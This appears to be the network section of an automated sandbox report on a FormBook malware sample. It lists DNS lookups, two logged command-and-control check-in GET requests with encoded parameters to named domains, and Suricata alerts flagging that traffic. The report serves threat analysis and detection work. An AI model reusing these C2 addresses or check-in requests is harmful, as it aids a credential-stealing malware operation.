Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.alexpresswholesaler.com | ||
| www.25egypt.net | 3.64.163.50 | |
| www.robinsons-pools.com |
CNAME
robinsons-pools.com
|
13.248.243.5 |
- UDP Requests
-
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:59005 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.101:53004
-
GET
410
http://www.25egypt.net/s20a/?5j=KTT9+VCcA37+xtRGjaV8luty/MFMKL8hzZvZ6YYNfMtl9gwTEgJdqydErXPa1splGINEUr1P&vTax-=LJBPmD1
REQUEST
RESPONSE
BODY
GET /s20a/?5j=KTT9+VCcA37+xtRGjaV8luty/MFMKL8hzZvZ6YYNfMtl9gwTEgJdqydErXPa1splGINEUr1P&vTax-=LJBPmD1 HTTP/1.1
Host: www.25egypt.net
Connection: close
HTTP/1.1 410 Gone
Server: openresty
Date: Mon, 06 Nov 2023 00:38:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
GET
301
http://www.robinsons-pools.com/s20a/?5j=X0kB3yCe2DbMHBjyZyduHI61R9zJKpP/1yM9ANRcG2StAR10Wwf8tUVEWg3X5jDkk9455Rxw&vTax-=LJBPmD1
REQUEST
RESPONSE
BODY
GET /s20a/?5j=X0kB3yCe2DbMHBjyZyduHI61R9zJKpP/1yM9ANRcG2StAR10Wwf8tUVEWg3X5jDkk9455Rxw&vTax-=LJBPmD1 HTTP/1.1
Host: www.robinsons-pools.com
Connection: close
HTTP/1.1 301 Moved Permanently
location: https://robinsons-pools.com/s20a/?5j=X0kB3yCe2DbMHBjyZyduHI61R9zJKpP/1yM9ANRcG2StAR10Wwf8tUVEWg3X5jDkk9455Rxw&vTax-=LJBPmD1
vary: Accept-Encoding
server: DPS/2.0.0+sha-2608708
x-version: 2608708
x-siteid: ap-southeast-1
set-cookie: dps_site_id=ap-southeast-1; path=/
date: Mon, 06 Nov 2023 00:38:49 GMT
keep-alive: timeout=5
transfer-encoding: chunked
connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49165 -> 3.64.163.50:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49166 -> 76.223.105.230:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts